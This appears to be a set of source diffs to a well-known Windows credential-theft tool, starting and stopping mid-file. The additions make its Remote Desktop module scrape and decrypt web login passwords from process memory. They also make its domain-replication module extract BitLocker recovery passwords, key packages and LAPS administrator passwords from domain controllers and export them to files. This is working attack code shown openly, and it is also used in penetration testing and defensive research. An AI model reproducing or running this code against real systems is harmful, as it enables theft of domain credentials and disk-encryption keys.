dwErr = ldap_search_s(*ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, pMessage);
|
||||
|
@ -204,12 +204,15 @@ NTSTATUS kuhl_m_ts_logonpasswords(int argc, wchar_t * argv[])
|
||||
const BYTE MyPattern[] = {0x00, 0x00, 0x00, 0x00, 0xbb, 0x47, /*0x0b, 0x00*/};
|
||||
const BYTE MyPattern2[] = {0x00, 0x00, 0x00, 0x00, 0xf3, 0x47, /*0x0b, 0x00*/};
|
||||
const BYTE MyPattern3[] = {0x00, 0x00, 0x00, 0x00, 0x3b, 0x01};
|
||||
const BYTE MyWebPattern[] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
|
||||
BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION pMemoryBasicInformation, PVOID pvArg)
|
||||
{
|
||||
KULL_M_MEMORY_ADDRESS aLocalBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aProcess = {pMemoryBasicInformation->BaseAddress, (PKULL_M_MEMORY_HANDLE) pvArg};
|
||||
PBYTE CurrentPtr, limite;
|
||||
PBYTE CurrentPtr, limite, ref;
|
||||
PWTS_KIWI pKiwiData;
|
||||
BOOL decStatus = TRUE, bIsCandidate;
|
||||
PWTS_WEB_KIWI pWebKiwiData;
|
||||
BOOL decStatus, bIsCandidate;
|
||||
DWORD dwOffset;
|
||||
|
||||
if((pMemoryBasicInformation->Type == MEM_PRIVATE) && (pMemoryBasicInformation->State != MEM_FREE) && (pMemoryBasicInformation->Protect == PAGE_READWRITE))
|
||||
{
|
||||
@ -218,7 +221,7 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalBuffer, &aProcess, pMemoryBasicInformation->RegionSize))
|
||||
{
|
||||
for(CurrentPtr = (PBYTE) aLocalBuffer.address, limite = (PBYTE) aLocalBuffer.address + pMemoryBasicInformation->RegionSize; CurrentPtr + sizeof(MyPattern) <= limite; CurrentPtr++)
|
||||
for(CurrentPtr = (PBYTE) aLocalBuffer.address, limite = (PBYTE) aLocalBuffer.address + pMemoryBasicInformation->RegionSize; CurrentPtr + sizeof(MyWebPattern) <= limite; CurrentPtr += sizeof(PVOID))
|
||||
{
|
||||
pKiwiData = (PWTS_KIWI) CurrentPtr;
|
||||
|
||||
@ -232,31 +235,91 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
|
||||
}
|
||||
else bIsCandidate = FALSE;
|
||||
|
||||
if(bIsCandidate && !pKiwiData->unk2)
|
||||
if(bIsCandidate)
|
||||
{
|
||||
//kprintf(L"-> %08x (%hu %hu %hu)\n", pKiwiData->unk1, pKiwiData->cbDomain, pKiwiData->cbUsername, pKiwiData->cbPassword);
|
||||
if(!(pKiwiData->cbDomain & 1) && (pKiwiData->cbDomain < sizeof(pKiwiData->Domain)))
|
||||
if(!pKiwiData->unk2)
|
||||
{
|
||||
if(!(pKiwiData->cbUsername & 1) && (pKiwiData->cbUsername > sizeof(wchar_t)) && (pKiwiData->cbUsername < sizeof(pKiwiData->UserName)))
|
||||
//kprintf(L"-> %08x (%hu %hu %hu)\n", pKiwiData->unk1, pKiwiData->cbDomain, pKiwiData->cbUsername, pKiwiData->cbPassword);
|
||||
if(!(pKiwiData->cbDomain & 1) && (pKiwiData->cbDomain < sizeof(pKiwiData->Domain)))
|
||||
{
|
||||
if(!(pKiwiData->cbPassword & 1) && (pKiwiData->cbPassword < sizeof(pKiwiData->Password)))
|
||||
if(!(pKiwiData->cbUsername & 1) && (pKiwiData->cbUsername > sizeof(wchar_t)) && (pKiwiData->cbUsername < sizeof(pKiwiData->UserName)))
|
||||
{
|
||||
kprintf(
|
||||
L"\n Domain : %.*s\n"
|
||||
L" UserName : %.*s\n",
|
||||
pKiwiData->cbDomain / sizeof(wchar_t), pKiwiData->Domain,
|
||||
pKiwiData->cbUsername/ sizeof(wchar_t), pKiwiData->UserName
|
||||
);
|
||||
|
||||
if(pKiwiData->cbPassword && (MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_10))
|
||||
if(!(pKiwiData->cbPassword & 1) && (pKiwiData->cbPassword < sizeof(pKiwiData->Password)))
|
||||
{
|
||||
decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pKiwiData->Password, sizeof(pKiwiData->Password), CRYPTPROTECTMEMORY_SAME_PROCESS);
|
||||
}
|
||||
kprintf(
|
||||
L"\n Domain : %.*s\n"
|
||||
L" UserName : %.*s\n",
|
||||
pKiwiData->cbDomain / sizeof(wchar_t), pKiwiData->Domain,
|
||||
pKiwiData->cbUsername / sizeof(wchar_t), pKiwiData->UserName
|
||||
);
|
||||
|
||||
if(pKiwiData->cbPassword && (MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_10))
|
||||
{
|
||||
decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pKiwiData->Password, sizeof(pKiwiData->Password), CRYPTPROTECTMEMORY_SAME_PROCESS);
|
||||
}
|
||||
else decStatus = TRUE;
|
||||
|
||||
if(decStatus)
|
||||
{
|
||||
kprintf(L" Password/Pin: %.*s\n", pKiwiData->cbPassword / sizeof(wchar_t), pKiwiData->Password);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
else if(RtlEqualMemory(MyWebPattern, CurrentPtr, sizeof(MyWebPattern)))
|
||||
{
|
||||
pWebKiwiData = (PWTS_WEB_KIWI) CurrentPtr;
|
||||
if(
|
||||
(pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000))
|
||||
&&
|
||||
(pWebKiwiData->Username.Length && !(pWebKiwiData->Username.Length % sizeof(wchar_t)) && (pWebKiwiData->Username.Length < ((WTS_USERNAME_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Username.Length == pWebKiwiData->Username.MaximumLength) || (pWebKiwiData->Username.Length == (pWebKiwiData->Username.MaximumLength - sizeof(wchar_t)))))
|
||||
)
|
||||
{
|
||||
if(
|
||||
(pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000))
|
||||
&&
|
||||
(pWebKiwiData->Password.Length && !(pWebKiwiData->Password.Length % sizeof(wchar_t)) && (pWebKiwiData->Password.Length < ((WTS_PASSWORD_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Password.Length == pWebKiwiData->Password.MaximumLength) || (pWebKiwiData->Password.Length == (pWebKiwiData->Password.MaximumLength - sizeof(wchar_t)))))
|
||||
)
|
||||
{
|
||||
// Domain is not mandatory here
|
||||
kprintf(L"\n * Web Credentials? *\n");
|
||||
ref = (PBYTE) aProcess.address + (CurrentPtr - (PBYTE) aLocalBuffer.address);
|
||||
|
||||
if(
|
||||
(pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000))
|
||||
&&
|
||||
(pWebKiwiData->Domain.Length && !(pWebKiwiData->Domain.Length % sizeof(wchar_t)) && (pWebKiwiData->Domain.Length < ((WTS_DOMAIN_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Domain.Length == pWebKiwiData->Domain.MaximumLength) || (pWebKiwiData->Domain.Length == (pWebKiwiData->Domain.MaximumLength - sizeof(wchar_t)))))
|
||||
)
|
||||
{
|
||||
pWebKiwiData->Domain.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Domain.Buffer);
|
||||
if(kull_m_process_getUnicodeString(&pWebKiwiData->Domain, aProcess.hMemory))
|
||||
{
|
||||
kprintf(L" Domain : %wZ\n", &pWebKiwiData->Domain);
|
||||
LocalFree(pWebKiwiData->Domain.Buffer);
|
||||
}
|
||||
}
|
||||
|
||||
pWebKiwiData->Username.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Username.Buffer);
|
||||
if(kull_m_process_getUnicodeString(&pWebKiwiData->Username, aProcess.hMemory))
|
||||
{
|
||||
kprintf(L" UserName : %wZ\n", &pWebKiwiData->Username);
|
||||
LocalFree(pWebKiwiData->Username.Buffer);
|
||||
}
|
||||
|
||||
pWebKiwiData->Password.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Password.Buffer);
|
||||
if(kull_m_process_getUnicodeString(&pWebKiwiData->Password, aProcess.hMemory))
|
||||
{
|
||||
decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pWebKiwiData->Password.Buffer, pWebKiwiData->Password.Length, CRYPTPROTECTMEMORY_SAME_PROCESS);
|
||||
if(decStatus)
|
||||
{
|
||||
kprintf(L" Password/Pin: %.*s\n", pKiwiData->cbPassword / sizeof(wchar_t), pKiwiData->Password);
|
||||
dwOffset = (lstrlen(pWebKiwiData->Password.Buffer) + 1) * sizeof(wchar_t);
|
||||
kprintf(L" Password/Pin: %s\n ", pWebKiwiData->Password.Buffer);
|
||||
}
|
||||
else kuhl_m_sekurlsa_trymarshal(&pWebKiwiData->Password);
|
||||
|
||||
LocalFree(pWebKiwiData->Password.Buffer);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -10,6 +10,7 @@
|
||||
#include "../../modules/kull_m_process.h"
|
||||
#include "../../modules/kull_m_memory.h"
|
||||
#include "../../modules/kull_m_crypto_remote.h"
|
||||
#include "sekurlsa/kuhl_m_sekurlsa.h"
|
||||
|
||||
const KUHL_M kuhl_m_ts;
|
||||
|
||||
@ -228,6 +229,14 @@ typedef struct _WTS_KIWI {
|
||||
} WTS_KIWI, *PWTS_KIWI;
|
||||
#pragma pack(pop)
|
||||
|
||||
typedef struct _WTS_WEB_KIWI {
|
||||
DWORD dwVersion;
|
||||
UNICODE_STRING Domain;
|
||||
UNICODE_STRING Username;
|
||||
UNICODE_STRING Password;
|
||||
//BYTE Data[ANYSIZE_ARRAY];
|
||||
} WTS_WEB_KIWI, *PWTS_WEB_KIWI;
|
||||
|
||||
typedef struct _TS_PROPERTY_KIWI {
|
||||
PCWSTR szProperty;
|
||||
DWORD dwType;
|
||||
|
@ -16,6 +16,7 @@ LPCSTR kuhl_m_lsadump_dcsync_oids[] = {
|
||||
szOID_ANSI_userAccountControl, szOID_ANSI_accountExpires, szOID_ANSI_pwdLastSet,
|
||||
szOID_ANSI_objectSid, szOID_ANSI_sIDHistory,
|
||||
szOID_ANSI_unicodePwd, szOID_ANSI_ntPwdHistory, szOID_ANSI_dBCSPwd, szOID_ANSI_lmPwdHistory, szOID_ANSI_supplementalCredentials,
|
||||
szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
|
||||
szOID_ANSI_trustPartner, szOID_ANSI_trustAuthIncoming, szOID_ANSI_trustAuthOutgoing,
|
||||
szOID_ANSI_currentValue,
|
||||
szOID_isDeleted,
|
||||
@ -25,6 +26,8 @@ LPCSTR kuhl_m_lsadump_dcsync_oids_export[] = {
|
||||
szOID_ANSI_sAMAccountName, szOID_ANSI_objectSid,
|
||||
szOID_ANSI_userAccountControl,
|
||||
szOID_ANSI_unicodePwd,
|
||||
szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
|
||||
szOID_ANSI_currentValue,
|
||||
szOID_isDeleted,
|
||||
};
|
||||
NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
@ -35,7 +38,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
DRS_HANDLE hDrs = NULL;
|
||||
DSNAME dsName = {0};
|
||||
DRS_MSG_GETCHGREQ getChReq = {0};
|
||||
DWORD dwOutVersion = 0, i, AuthnSvc;
|
||||
DWORD dwOutVersion = 0, i, AuthnSvc, suppAtt = 0;
|
||||
DRS_MSG_GETCHGREPLY getChRep;
|
||||
ULONG drsStatus;
|
||||
LPCWSTR szUser = NULL, szGuid = NULL, szDomain = NULL, szDc = NULL, szService;
|
||||
@ -43,6 +46,9 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
DRS_EXTENSIONS_INT DrsExtensionsInt;
|
||||
BOOL someExport = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL), allData = kull_m_string_args_byName(argc, argv, L"all", NULL, NULL), csvOutput = kull_m_string_args_byName(argc, argv, L"csv", NULL, NULL), withDeleted = kull_m_string_args_byName(argc, argv, L"deleted", NULL, NULL), decodeUAC = kull_m_string_args_byName(argc, argv, L"uac", NULL, NULL), bAuthNtlm = kull_m_string_args_byName(argc, argv, L"authntlm", NULL, NULL);
|
||||
SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
|
||||
PWCHAR dn;
|
||||
PLDAP ld;
|
||||
ATTRTYP SuppATT_IntId[2] = {0, 0}; // [0] msMcsAdmPwd, [1] msMcsAdmPwdExpirationTime
|
||||
|
||||
if(!kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
|
||||
if(kull_m_net_getCurrentDomainInfo(&pPolicyDnsDomainInfo))
|
||||
@ -68,6 +74,27 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
kprintf(L"[DC] \'%s\' will be the user account\n", szUser);
|
||||
|
||||
kull_m_rpc_getArgs(argc, argv, NULL, NULL, NULL, &szService, L"ldap", &AuthnSvc, ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), NULL, &secIdentity, NULL, TRUE);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"laps", NULL, NULL))
|
||||
{
|
||||
if(kull_m_ldap_getLdapAndRootDN(szDc, L"schemaNamingContext", &ld, &dn, secIdentity.UserLength ? &secIdentity : NULL))
|
||||
{
|
||||
if(
|
||||
kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(ld, dn, L"(&(objectclass=attributeSchema)(attributeID=" TEXT(szOID_ANSI_msMcsAdmPwd) L"))", SuppATT_IntId + 0)
|
||||
&&
|
||||
kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(ld, dn, L"(&(objectclass=attributeSchema)(attributeID=" TEXT(szOID_ANSI_msMcsAdmPwdExpirationTime) L"))", SuppATT_IntId + 1)
|
||||
)
|
||||
{
|
||||
if(SuppATT_IntId[0] && SuppATT_IntId[1])
|
||||
{
|
||||
suppAtt = 2;
|
||||
}
|
||||
}
|
||||
LocalFree(dn);
|
||||
ldap_unbind(ld);
|
||||
}
|
||||
}
|
||||
|
||||
if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szDc, NULL, szService, TRUE, bAuthNtlm ? RPC_C_AUTHN_WINNT : ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hBinding, kull_m_rpc_drsr_RpcSecurityCallback))
|
||||
{
|
||||
if(kull_m_rpc_drsr_getDomainAndUserInfos(&hBinding, szDc, szDomain, &getChReq.V8.uuidDsaObjDest, szUser, szGuid, &dsName.Guid, &DrsExtensionsInt))
|
||||
@ -82,10 +109,11 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
getChReq.V8.cMaxBytes = 0x00a00000; // 10M
|
||||
getChReq.V8.ulExtendedOp = (allData ? 0 : EXOP_REPL_OBJ);
|
||||
|
||||
if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * ((allData ? ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export) : ARRAYSIZE(kuhl_m_lsadump_dcsync_oids)) - 1)))
|
||||
if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * (suppAtt + (allData ? ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export) : ARRAYSIZE(kuhl_m_lsadump_dcsync_oids)) - 1)))
|
||||
{
|
||||
getChReq.V8.pPartialAttrSet->dwVersion = 1;
|
||||
getChReq.V8.pPartialAttrSet->dwReserved1 = 0;
|
||||
|
||||
if(allData)
|
||||
{
|
||||
getChReq.V8.pPartialAttrSet->cAttrs = ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export);
|
||||
@ -98,6 +126,13 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
for(i = 0; i < getChReq.V8.pPartialAttrSet->cAttrs; i++)
|
||||
kull_m_rpc_drsr_MakeAttid(&getChReq.V8.PrefixTableDest, kuhl_m_lsadump_dcsync_oids[i], &getChReq.V8.pPartialAttrSet->rgPartialAttr[i], TRUE);
|
||||
}
|
||||
|
||||
if(suppAtt)
|
||||
{
|
||||
getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[0];
|
||||
getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[1];
|
||||
}
|
||||
|
||||
RpcTryExcept
|
||||
{
|
||||
do
|
||||
@ -116,7 +151,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
if(csvOutput)
|
||||
kuhl_m_lsadump_dcsync_descrObject_csv(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, withDeleted, decodeUAC);
|
||||
else
|
||||
kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, someExport);
|
||||
kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, someExport, SuppATT_IntId, ARRAYSIZE(SuppATT_IntId));
|
||||
pObject = pObject->pNextEntInf;
|
||||
}
|
||||
}
|
||||
@ -166,6 +201,51 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn, PWCHAR req, ATTRTYP *pIntId)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
PWCHAR myAttrs[] = {L"msDS-IntId", NULL};
|
||||
DWORD ret;
|
||||
PLDAPMessage pMessage = NULL, pEntry;
|
||||
PBERVAL *pId;
|
||||
PSTR tmpString;
|
||||
|
||||
ret = ldap_search_s(ld, dn, LDAP_SCOPE_ONELEVEL, req, myAttrs, FALSE, &pMessage);
|
||||
if(ret == LDAP_SUCCESS)
|
||||
{
|
||||
if(ldap_count_entries(ld, pMessage) == 1)
|
||||
{
|
||||
if(pEntry = ldap_first_entry(ld, pMessage))
|
||||
{
|
||||
kprintf(L"[ldap] %s : ", ldap_get_dn(ld, pEntry));
|
||||
pId = ldap_get_values_len(ld, pEntry, myAttrs[0]);
|
||||
if(pId && pId[0])
|
||||
{
|
||||
if(tmpString = (PSTR) LocalAlloc(LPTR, pId[0]->bv_len + 1))
|
||||
{
|
||||
RtlCopyMemory(tmpString, pId[0]->bv_val, pId[0]->bv_len);
|
||||
*pIntId = strtol(tmpString, NULL, 10);
|
||||
kprintf(L"0x%08x\n", *pIntId);
|
||||
status = TRUE;
|
||||
|
||||
LocalFree(tmpString);
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"No values?\n");
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"More than one entry?\n");
|
||||
}
|
||||
else PRINT_ERROR(L"ldap_search_s 0x%x (%u)\n", ret, ret);
|
||||
|
||||
if(pMessage)
|
||||
{
|
||||
ldap_msgfree(pMessage);
|
||||
}
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory)
|
||||
{
|
||||
DWORD i;
|
||||
@ -233,12 +313,15 @@ void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATT
|
||||
}
|
||||
}
|
||||
|
||||
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport)
|
||||
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId)
|
||||
{
|
||||
kull_m_rpc_drsr_findPrintMonoAttr(L"\nObject RDN : ", prefixTable, attributes, szOID_ANSI_name, TRUE);
|
||||
|
||||
kprintf(L"\n");
|
||||
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountName, NULL, NULL))
|
||||
kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes);
|
||||
kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes, pSuppATT_IntId, cSuppATT_IntId);
|
||||
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, NULL, NULL))
|
||||
kuhl_m_lsadump_dcsync_descrBitlocker(prefixTable, attributes, someExport);
|
||||
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_trustPartner, NULL, NULL))
|
||||
kuhl_m_lsadump_dcsync_descrTrust(prefixTable, attributes, szSrcDomain);
|
||||
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_currentValue, NULL, NULL))
|
||||
@ -292,7 +375,88 @@ LPCWSTR kuhl_m_lsadump_samAccountType_toString(DWORD accountType)
|
||||
return target;
|
||||
}
|
||||
|
||||
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes)
|
||||
void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport)
|
||||
{
|
||||
UNICODE_STRING uString = {0};
|
||||
DWORD szData = 0;
|
||||
PVOID data = 0;
|
||||
GUID RecoveryGuid;
|
||||
PWCHAR filename;
|
||||
|
||||
kprintf(L"** BITLOCKER RECOVERY INFORMATION **\n\n");
|
||||
|
||||
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEVolumeGuid, &data, NULL))
|
||||
{
|
||||
kprintf(L"Volume GUID : ");
|
||||
kull_m_string_displayGUID((LPCGUID) data);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
|
||||
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, &RecoveryGuid, NULL))
|
||||
{
|
||||
kprintf(L"Recovery GUID : ");
|
||||
kull_m_string_displayGUID(&RecoveryGuid);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
else
|
||||
{
|
||||
UuidCreate(&RecoveryGuid);
|
||||
if(someExport)
|
||||
{
|
||||
kprintf(L"Recovery GUID (fake) : ");
|
||||
kull_m_string_displayGUID(&RecoveryGuid);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
|
||||
if(someExport)
|
||||
{
|
||||
RtlStringFromGUID(&RecoveryGuid, &uString);
|
||||
}
|
||||
|
||||
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryPassword, &data, &szData))
|
||||
{
|
||||
if(szData > 0)
|
||||
{
|
||||
kprintf(L"Recovery Password : %s\n", data);
|
||||
|
||||
if(someExport)
|
||||
{
|
||||
if(filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, uString.Buffer ? uString.Buffer : L"(noguid)", L"recoveryPassword"))
|
||||
{
|
||||
kprintf(L"\tExport : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
|
||||
LocalFree(filename);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEKeyPackage, &data, &szData))
|
||||
{
|
||||
if(szData > 0)
|
||||
{
|
||||
kprintf(L"Key Package Size : %u byte(s)\nKey Package : [", szData);
|
||||
kull_m_string_wprintf_hex(data, szData, 0);
|
||||
kprintf(L"]\n");
|
||||
|
||||
if (someExport)
|
||||
{
|
||||
if(filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, uString.Buffer ? uString.Buffer : L"(noguid)", L"keyPackage"))
|
||||
{
|
||||
kprintf(L"\tExport : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
|
||||
LocalFree(filename);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (uString.Buffer)
|
||||
{
|
||||
RtlFreeUnicodeString(&uString);
|
||||
}
|
||||
}
|
||||
|
||||
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId)
|
||||
{
|
||||
DWORD rid = 0, i;
|
||||
PBYTE encodedData;
|
||||
@ -365,6 +529,21 @@ void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK
|
||||
kprintf(L"\nSupplemental Credentials:\n");
|
||||
kuhl_m_lsadump_dcsync_descrUserProperties((PUSER_PROPERTIES) encodedData);
|
||||
}
|
||||
|
||||
if((cSuppATT_IntId >= 2) && pSuppATT_IntId[0] && pSuppATT_IntId[1])
|
||||
{
|
||||
kprintf(L"LAPS:\n");
|
||||
if(kull_m_rpc_drsr_findMonoAttrNoOID(attributes, pSuppATT_IntId[0], &encodedData, &encodedDataSize))
|
||||
{
|
||||
kprintf(L" Password : %.*S\n", encodedDataSize, encodedData);
|
||||
}
|
||||
if(kull_m_rpc_drsr_findMonoAttrNoOID(attributes, pSuppATT_IntId[1], &data, NULL))
|
||||
{
|
||||
kprintf(L" Last change: ");
|
||||
kull_m_string_displayLocalFileTime((LPFILETIME) data);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
DECLARE_CONST_UNICODE_STRING(PrimaryCleartext, L"Primary:CLEARTEXT");
|
||||
@ -2096,7 +2275,6 @@ BOOL kuhl_m_lsadump_dcshadow_build_replication(PDCSHADOW_DOMAIN_INFO info)
|
||||
kprintf(L" uidOriginatingDsa:");
|
||||
kull_m_string_displayGUID(&attr->MetaData.uidOriginatingDsa);
|
||||
kprintf(L"\n");
|
||||
|
||||
}
|
||||
kprintf(L"\n");
|
||||
}
|
||||
@ -3046,4 +3224,4 @@ ULONG SRV_IDL_DRSVerifyNames(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_VERIFYR
|
||||
ULONG SRV_IDL_DRSUpdateRefs(DRS_HANDLE hDrs, DWORD dwVersion, DRS_MSG_UPDREFS *pmsgUpdRefs)
|
||||
{
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
}
|
||||
|
@ -12,6 +12,8 @@
|
||||
#include "../modules/rpc/kull_m_rpc_drsr.h"
|
||||
#include "../kuhl_m.h"
|
||||
#include "../kuhl_m_lsadump.h" // to move
|
||||
#include "../modules/kull_m_string.h"
|
||||
#include "../modules/kull_m_ldap.h"
|
||||
|
||||
NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_lsadump_dcshadow(int argc, wchar_t * argv[]);
|
||||
@ -39,13 +41,15 @@ typedef struct _USER_PROPERTIES {
|
||||
|
||||
const wchar_t * KUHL_M_LSADUMP_UF_FLAG[32];
|
||||
|
||||
BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn, PWCHAR req, ATTRTYP *pIntId);
|
||||
BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory);
|
||||
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport);
|
||||
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes);
|
||||
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId);
|
||||
